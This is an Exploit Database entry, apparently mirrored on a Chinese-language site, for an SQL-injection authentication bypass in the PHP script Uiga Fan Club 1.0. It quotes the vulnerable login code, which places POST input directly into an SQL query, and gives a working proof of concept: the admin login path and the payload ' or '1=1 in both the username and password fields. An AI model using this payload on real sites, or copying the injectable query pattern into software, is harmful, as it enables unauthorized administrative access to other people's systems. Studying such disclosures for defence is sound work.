Uiga Fan Club 1.0 – Authentication Bypass

• Exploit Database
• 10 阅读

• 作者： cr4wl3r
  日期： 2010-02-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11593/

• # Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
  ###########################################################################
  # Author: cr4wl3r
  # Download: http://www.scriptdevelopers.net/download/uigafanclub.zip
  ###########################################################################
  #if (isset($_POST['admin_name']))
  # {
  # $admin_name=$_POST['admin_name'];
  # $admin_password=$_POST['admin_password'];
  #
  #
  # if(empty($admin_name))
  # {
  # $errorMessage=warning." Username is empty!";
  # }
  # elseif(empty($admin_password))
  # {
  # $errorMessage=warning." Password is empty!";
  # }
  # 
  # 
  # else
  # {
  # $sql="SELECT * 
  # 	 FROM admin
  #	 WHERE admin_name='$admin_name' and admin_password='$admin_password'";
  #
  ###########################################################################
  
  ###############################################
  PoC: [path]/admin/admin_login.php
  
   Username: ' or '1=1
   password: ' or '1=1
  ###############################################